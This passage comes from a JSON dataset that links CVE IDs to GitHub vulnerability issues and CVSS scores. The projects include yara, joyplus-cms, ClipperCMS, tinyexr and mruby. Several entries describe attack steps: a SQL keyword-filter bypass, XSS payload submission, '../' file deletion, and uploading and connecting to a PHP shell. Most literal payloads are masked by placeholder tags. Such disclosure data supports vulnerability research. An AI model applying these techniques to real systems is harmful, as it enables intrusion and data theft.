  20432. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20433. "severity": "HIGH",
  20434. "baseScore": 7.5,
  20435. "impactScore": 5.9,
  20436. "exploitabilityScore": 1.6
  20437. },
  20438. {
  20439. "CVE_ID": "CVE-2018-12034",
  20440. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/891",
  20441. "Issue_Url_new": "https://github.com/virustotal/yara/issues/891",
  20442. "Repo_new": "virustotal/yara",
  20443. "Issue_Created_At": "2018-06-07T22:55:17Z",
  20444. "description": "Out of bounds read, write in yr_execute_code. APITAG has several bugs in the implementation of the virtual machine. Two of which prove to be security issues that allow code execution by running a specially crafted binary rule: An out of bounds read in the opcode OP_PUSH_M URLTAG An out of bounds write in the opcode OP_POP_M URLTAG . These issues have been assigned the CVE ID's APITAG and APITAG , respectively. Obvious ways to mitigate this: checking every access to scratch memory require an explicit flag to load and run a compiled rule check every relocated address is within the loaded file make the loaded file read only While this might not be _as_ critical as say, a vulnerability that can be exploited by a rule in source form, YARA will run a binary rule without explicitly being told to do so. This means any service/third party who doesn't properly validate the user supplied rule is susceptible. I suggest you reject rules in binary form unless explicitly being allowed to do so. For the ones interested, I've written a (very long) write up URLTAG and made the APITAG exploit available here URLTAG",
  20445. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20446. "severity": "HIGH",
  20447. "baseScore": 7.8,
  20448. "impactScore": 5.9,
  20449. "exploitabilityScore": 1.8
  20450. },
  20451. {
  20452. "CVE_ID": "CVE-2018-12039",
  20453. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/425",
  20454. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/425",
  20455. "Repo_new": "joyplus/joyplus-cms",
  20456. "Issue_Created_At": "2018-06-07T08:36:26Z",
  20457. "description": "joyplus cms has SQL code execution vulnerability. We can find website absolute path on this page: FILETAG in my test environment the absolute path is PATHTAG and execute the SQL statement in this page: FILETAG There is a note here that we can't use \"select\" directly. Here I used \"/ !select /\" to replace \"select\" then click the \"\u6267\u884c\"\uff08execute\uff09button\uff0cfinally we can find the phpinfo page on FILETAG FILETAG FILETAG",
  20458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20459. "severity": "CRITICAL",
  20460. "baseScore": 9.8,
  20461. "impactScore": 5.9,
  20462. "exploitabilityScore": 3.9
  20463. },
  20464. {
  20465. "CVE_ID": "CVE-2018-12047",
  20466. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/147",
  20467. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/147",
  20468. "Repo_new": "ximdex/xcms",
  20469. "Issue_Created_At": "2018-06-06T09:13:40Z",
  20470. "description": "you have twelve parameters exists xss Vulnerability in search page.. Vulnerability url : URLTAG Vulnerability parameters: filter FILETAG NUMBERTAG use hackbar to simulate post submission, submit payload NUMBERTAG the response page will pop up the set contents according to the inserted js code NUMBERTAG using another question parameters found to produce the same effect. FILETAG FILETAG",
  20471. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20472. "severity": "MEDIUM",
  20473. "baseScore": 6.1,
  20474. "impactScore": 2.7,
  20475. "exploitabilityScore": 2.8
  20476. },
  20477. {
  20478. "CVE_ID": "CVE-2018-12051",
  20479. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/5",
  20480. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/5",
  20481. "Repo_new": "unh3x/just4cve",
  20482. "Issue_Created_At": "2018-06-07T08:36:17Z",
  20483. "description": "Schools Alert Management Script Arbitrary File Upload. ================= Schools Alert Management Script Arbitrary File Upload ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= ERRORTAG FILETAG FILETAG . Shell is shown in response data, just enjoy it. .",
  20484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20485. "severity": "CRITICAL",
  20486. "baseScore": 9.8,
  20487. "impactScore": 5.9,
  20488. "exploitabilityScore": 3.9
  20489. },
  20490. {
  20491. "CVE_ID": "CVE-2018-12053",
  20492. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/6",
  20493. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/6",
  20494. "Repo_new": "unh3x/just4cve",
  20495. "Issue_Created_At": "2018-06-07T08:56:29Z",
  20496. "description": "Schools Alert Management Script Arbitrary File Deletion. ================= Schools Alert Management Script Arbitrary File Deletion ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG notice: There is a risk of file deletion\uff0cyou'd better test it combined with the furthur file upload vulnerability. Attackers can delete any file through parameter 'img' with '../' .",
  20497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  20498. "severity": "HIGH",
  20499. "baseScore": 7.5,
  20500. "impactScore": 3.6,
  20501. "exploitabilityScore": 3.9
  20502. },
  20503. {
  20504. "CVE_ID": "CVE-2018-12054",
  20505. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/4",
  20506. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/4",
  20507. "Repo_new": "unh3x/just4cve",
  20508. "Issue_Created_At": "2018-06-07T02:03:32Z",
  20509. "description": "Schools Alert Management Script Arbitrary File Read. ================= Schools Alert Management Script Arbitrary File Read ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG FILETAG",
  20510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  20511. "severity": "HIGH",
  20512. "baseScore": 7.5,
  20513. "impactScore": 3.6,
  20514. "exploitabilityScore": 3.9
  20515. },
  20516. {
  20517. "CVE_ID": "CVE-2018-12055",
  20518. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/2",
  20519. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/2",
  20520. "Repo_new": "unh3x/just4cve",
  20521. "Issue_Created_At": "2018-06-06T23:57:11Z",
  20522. "description": "Schools Alert Management Script Multiple SQL Injections. ================= Exploit Title: Schools Alert Management Script SQL Injections Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG ================= Proof of Concept ================= POST URLTAG FILETAG",
  20523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20524. "severity": "CRITICAL",
  20525. "baseScore": 9.8,
  20526. "impactScore": 5.9,
  20527. "exploitabilityScore": 3.9
  20528. },
  20529. {
  20530. "CVE_ID": "CVE-2018-12065",
  20531. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/152",
  20532. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/152",
  20533. "Repo_new": "creatiwity/witycms",
  20534. "Issue_Created_At": "2018-06-08T06:35:41Z",
  20535. "description": "The Local File Inclusion vulnerability in PATHTAG I found a local file inclusion vulnerability.An attacker might include local PHP files or read non PHP files with this vulnerability. Reference: URLTAG",
  20536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20537. "severity": "CRITICAL",
  20538. "baseScore": 9.8,
  20539. "impactScore": 5.9,
  20540. "exploitabilityScore": 3.9
  20541. },
  20542. {
  20543. "CVE_ID": "CVE-2018-12085",
  20544. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/595",
  20545. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/595",
  20546. "Repo_new": "liblouis/liblouis",
  20547. "Issue_Created_At": "2018-06-05T21:09:49Z",
  20548. "description": "APITAG stack based buffer overflow APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20549. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20550. "severity": "HIGH",
  20551. "baseScore": 8.8,
  20552. "impactScore": 5.9,
  20553. "exploitabilityScore": 2.8
  20554. },
  20555. {
  20556. "CVE_ID": "CVE-2018-12089",
  20557. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4628",
  20558. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4628",
  20559. "Repo_new": "octopusdeploy/issues",
  20560. "Issue_Created_At": "2018-06-11T05:39:23Z",
  20561. "description": "SF Target prints password in clear text. Scenario: Service Fabric Cluster Target Configured with Azure Active Directory security mode APITAG set to true Password from will be printed in clear text in the log file Venerable in versions NUMBERTAG APITAG Fixed in NUMBERTAG",
  20562. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  20563. "severity": "HIGH",
  20564. "baseScore": 7.5,
  20565. "impactScore": 5.9,
  20566. "exploitabilityScore": 1.6
  20567. },
  20568. {
  20569. "CVE_ID": "CVE-2018-12092",
  20570. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/78",
  20571. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/78",
  20572. "Repo_new": "syoyo/tinyexr",
  20573. "Issue_Created_At": "2018-06-10T08:47:01Z",
  20574. "description": "Heap buffer overflow in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered. Address sanitizer provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b bp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG sp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG b NUMBERTAG d thread T NUMBERTAG a in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG in APITAG , APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&, unsigned char const , unsigned long) PATHTAG NUMBERTAG fd4 in APITAG PATHTAG NUMBERTAG a8a in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f5 in main PATHTAG NUMBERTAG f2ff6d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Load EXR err: Failed to parse channel APITAG NUMBERTAG",
  20575. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20576. "severity": "CRITICAL",
  20577. "baseScore": 9.8,
  20578. "impactScore": 5.9,
  20579. "exploitabilityScore": 3.9
  20580. },
  20581. {
  20582. "CVE_ID": "CVE-2018-12093",
  20583. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/79",
  20584. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/79",
  20585. "Repo_new": "syoyo/tinyexr",
  20586. "Issue_Created_At": "2018-06-10T08:48:05Z",
  20587. "description": "Memory leaks in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and leak sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), sanitizer detected memory leaks in APITAG . Leak sanitizer provided information as below NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in strdup PATHTAG NUMBERTAG a6a7 in APITAG PATHTAG NUMBERTAG cd in APITAG PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s)",
  20588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20589. "severity": "HIGH",
  20590. "baseScore": 7.5,
  20591. "impactScore": 3.6,
  20592. "exploitabilityScore": 3.9
  20593. },
  20594. {
  20595. "CVE_ID": "CVE-2018-12101",
  20596. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/496",
  20597. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/496",
  20598. "Repo_new": "clippercms/clippercms",
  20599. "Issue_Created_At": "2019-08-05T20:58:58Z",
  20600. "description": "HTML injection is found in CMS Clipper NUMBERTAG ersion. HTML injection found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Security >> Manager Permissions >> User Groups NUMBERTAG Create New user group using APITAG is Prasad Lingamaiah APITAG ! APITAG NUMBERTAG Goto the APITAG Group links and html script will execute For your reference: FILETAG FILETAG",
  20601. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20602. "severity": "MEDIUM",
  20603. "baseScore": 5.4,
  20604. "impactScore": 2.7,
  20605. "exploitabilityScore": 2.3
  20606. },
  20607. {
  20608. "CVE_ID": "CVE-2018-12101",
  20609. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/487",
  20610. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/487",
  20611. "Repo_new": "clippercms/clippercms",
  20612. "Issue_Created_At": "2018-06-10T20:09:24Z",
  20613. "description": "XSS. XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG ersion. The Security name value is obtained from the webusers, having search parameter for user list. it is getting reflected and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on web users >>search parameter NUMBERTAG in search parameter enter XSS payload '\">> APITAG APITAG APITAG \"> APITAG APITAG APITAG and click on GO button APITAG script is getting executed. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
  20614. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20615. "severity": "MEDIUM",
  20616. "baseScore": 5.4,
  20617. "impactScore": 2.7,
  20618. "exploitabilityScore": 2.3
  20619. },
  20620. {
  20621. "CVE_ID": "CVE-2018-12101",
  20622. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/488",
  20623. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/488",
  20624. "Repo_new": "clippercms/clippercms",
  20625. "Issue_Created_At": "2018-06-10T20:32:47Z",
  20626. "description": "Stored XSS in Manager Permissions. Stored XSS is found in the APITAG Permissions\" field in CMS Clipper NUMBERTAG ersion. The Manager Permissions value is obtained from the User Groups, Resource Groups and Users/resource group links. which having adding users list and groups list. it is getting stored and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Users Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Resource Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Users/resource group links submit the XSS payload which we have saved. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
  20627. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20628. "severity": "MEDIUM",
  20629. "baseScore": 5.4,
  20630. "impactScore": 2.7,
  20631. "exploitabilityScore": 2.3
  20632. },
  20633. {
  20634. "CVE_ID": "CVE-2018-12102",
  20635. "Issue_Url_old": "https://github.com/mity/md4c/issues/41",
  20636. "Issue_Url_new": "https://github.com/mity/md4c/issues/41",
  20637. "Repo_new": "mity/md4c",
  20638. "Issue_Created_At": "2018-06-11T03:31:18Z",
  20639. "description": "NULL pointer dereferenc in APITAG i find a Segmentation fault ,when i used md2html. ./md2html github crash1 it is a NULL pointer dereferenc in URLTAG ctx >current_block is a null pointer. but i find you did the assert in URLTAG dont know why it does not work. i just git clone it and use cmake . and make to build it. CODETAG this is the crash file : FILETAG",
  20640. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20641. "severity": "MEDIUM",
  20642. "baseScore": 5.5,
  20643. "impactScore": 3.6,
  20644. "exploitabilityScore": 1.8
  20645. },
  20646. {
  20647. "CVE_ID": "CVE-2018-12104",
  20648. "Issue_Url_old": "https://github.com/airbnb/knowledge-repo/issues/431",
  20649. "Issue_Url_new": "https://github.com/airbnb/knowledge-repo/issues/431",
  20650. "Repo_new": "airbnb/knowledge-repo",
  20651. "Issue_Created_At": "2018-06-10T10:17:29Z",
  20652. "description": "XSS vulnerability. Auto reviewers: MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Hello, guys! There is a cross site scripting (XSS) vulnerability in the Knowledge Repo NUMBERTAG other versions may be affected as well) which allows remote attackers to inject arbitrary APITAG via post comments functionality. Steps to reproduce: Just open any post like this FILETAG and add the following code as a APITAG APITAG side attacks is possible here!\"); APITAG Impact: An unauthenticated evil user can leverage the vulnerability to conduct various types of client side attacks, for example, conducting a browser mining, redirecting users to malicious sites or hijacking the user\u2019s browser using malware. As an irrefutable evidence please take a look at the attached screen shot. Mitigation: Details on how to prevent XSS can be found here: URLTAG APITAG FILETAG",
  20653. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20654. "severity": "MEDIUM",
  20655. "baseScore": 6.1,
  20656. "impactScore": 2.7,
  20657. "exploitabilityScore": 2.8
  20658. },
  20659. {
  20660. "CVE_ID": "CVE-2018-12108",
  20661. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/107",
  20662. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/107",
  20663. "Repo_new": "dropbox/lepton",
  20664. "Issue_Created_At": "2018-06-09T13:49:30Z",
  20665. "description": "Program received signal SIGFPE, Arithmetic exception. . Hi, all. This malformed lepton file can cause crash. Program received signal SIGFPE, Arithmetic exception. This is the FILETAG . ERRORTAG Here is the gdb information: CODETAG",
  20666. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20667. "severity": "MEDIUM",
  20668. "baseScore": 5.5,
  20669. "impactScore": 3.6,
  20670. "exploitabilityScore": 1.8
  20671. },
  20672. {
  20673. "CVE_ID": "CVE-2018-12109",
  20674. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/513",
  20675. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/513",
  20676. "Repo_new": "flif-hub/flif",
  20677. "Issue_Created_At": "2018-06-10T09:04:50Z",
  20678. "description": "FLIF crash with specific image: heap buffer overflow. Hi, all. This PAM image file can cause crash. It can cause heap buffer overflow. Here is ASAN result and I attached the FILETAG . Thanks. Execute the following command: APITAG ASAN result: ERRORTAG",
  20679. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20680. "severity": "HIGH",
  20681. "baseScore": 7.8,
  20682. "impactScore": 5.9,
  20683. "exploitabilityScore": 1.8
  20684. },
  20685. {
  20686. "CVE_ID": "CVE-2018-12110",
  20687. "Issue_Url_old": "https://github.com/oyeahtime/test/issues/2",
  20688. "Issue_Url_new": "https://github.com/oyeahtime/test/issues/2",
  20689. "Repo_new": "oyeahtime/test",
  20690. "Issue_Created_At": "2018-06-11T01:28:26Z",
  20691. "description": "APITAG sql injection. APITAG is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms We can get the source code : URLTAG the SQL injection use like this NUMBERTAG install the portfoliocms,for example : URLTAG the sql injection payload: URLTAG and NUMBERTAG union all select APITAG NUMBERTAG FILETAG",
  20692. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  20693. "severity": "HIGH",
  20694. "baseScore": 7.2,
  20695. "impactScore": 5.9,
  20696. "exploitabilityScore": 1.2
  20697. },
  20698. {
  20699. "CVE_ID": "CVE-2018-12112",
  20700. "Issue_Url_old": "https://github.com/mity/md4c/issues/42",
  20701. "Issue_Url_new": "https://github.com/mity/md4c/issues/42",
  20702. "Repo_new": "mity/md4c",
  20703. "Issue_Created_At": "2018-06-11T09:09:38Z",
  20704. "description": "heap_overflow in function md_build_attribute APITAG commit cb7ecd7 ./md2html github crash2 in function md_build_attribute , URLTAG The raw_size is too large to cause a heap overflow ERRORTAG poc file: FILETAG",
  20705. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20706. "severity": "HIGH",
  20707. "baseScore": 7.8,
  20708. "impactScore": 5.9,
  20709. "exploitabilityScore": 1.8
  20710. },
  20711. {
  20712. "CVE_ID": "CVE-2018-12229",
  20713. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3785",
  20714. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3785",
  20715. "Repo_new": "pkp/pkp-lib",
  20716. "Issue_Created_At": "2018-06-11T18:53:52Z",
  20717. "description": "Correct missing escaping of template variable. The APITAG variable in APITAG is not escaped.",
  20718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20719. "severity": "MEDIUM",
  20720. "baseScore": 6.1,
  20721. "impactScore": 2.7,
  20722. "exploitabilityScore": 2.8
  20723. },
  20724. {
  20725. "CVE_ID": "CVE-2018-12247",
  20726. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4036",
  20727. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4036",
  20728. "Repo_new": "mruby/mruby",
  20729. "Issue_Created_At": "2018-06-05T19:02:11Z",
  20730. "description": "Null pointer dereference in mrb_class. The following input demonstrates a crash: APITAG Note that I was only able to reproduce this issue when building mruby on a NUMBERTAG bit Linux system. (I used Ubuntu NUMBERTAG for testing.) I could not reproduce on NUMBERTAG bit Linux or NUMBERTAG bit APITAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
  20731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20732. "severity": "HIGH",
  20733. "baseScore": 7.5,
  20734. "impactScore": 3.6,
  20735. "exploitabilityScore": 3.9
  20736. },
  20737. {
  20738. "CVE_ID": "CVE-2018-12248",
  20739. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4038",
  20740. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4038",
  20741. "Repo_new": "mruby/mruby",
  20742. "Issue_Created_At": "2018-06-05T22:08:03Z",
  20743. "description": "Heap buffer overflow in OP_ENTER. The following input demonstrates a crash: CODETAG This issue looks similar to NUMBERTAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
  20744. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20745. "severity": "HIGH",
  20746. "baseScore": 7.5,
  20747. "impactScore": 3.6,
  20748. "exploitabilityScore": 3.9
  20749. },
  20750. {
  20751. "CVE_ID": "CVE-2018-12249",
  20752. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4037",
  20753. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4037",
  20754. "Repo_new": "mruby/mruby",
  20755. "Issue_Created_At": "2018-06-05T19:26:59Z",
  20756. "description": "Null pointer dereference in mrb_class_real. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
  20757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20758. "severity": "HIGH",
  20759. "baseScore": 7.5,
  20760. "impactScore": 3.6,
  20761. "exploitabilityScore": 3.9
  20762. },
  20763. {
  20764. "CVE_ID": "CVE-2018-12263",
  20765. "Issue_Url_old": "https://github.com/oyeahtime/test/issues/3",
  20766. "Issue_Url_new": "https://github.com/oyeahtime/test/issues/3",
  20767. "Repo_new": "oyeahtime/test",
  20768. "Issue_Created_At": "2018-06-12T06:48:13Z",
  20769. "description": "APITAG file upload. APITAG is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms We can get the source code : URLTAG file upload poc: URLTAG we can upload a php shell FILETAG connect the shell FILETAG",
  20770. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  20771. "severity": "HIGH",
  20772. "baseScore": 8.8,
  20773. "impactScore": 5.9,
  20774. "exploitabilityScore": 2.8
  20775. },
  20776. {
  20777. "CVE_ID": "CVE-2018-12264",
  20778. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/366",
  20779. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/366",
  20780. "Repo_new": "exiv2/exiv2",
  20781. "Issue_Created_At": "2018-06-11T11:33:59Z",
  20782. "description": "out of bound read in function std::memcpy (tmp, buf, len) in PATHTAG PATHTAG ./exi NUMBERTAG ep NUMBERTAG out of read Poc Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG APITAG LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep NUMBERTAG out of read Poc'. Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG fe NUMBERTAG af NUMBERTAG in APITAG APITAG (this NUMBERTAG e NUMBERTAG c NUMBERTAG buf NUMBERTAG fe NUMBERTAG c3ff7 <error: Cannot access memory at address NUMBERTAG fe NUMBERTAG c3ff7>, len NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG e0c1 in (anonymous APITAG (this 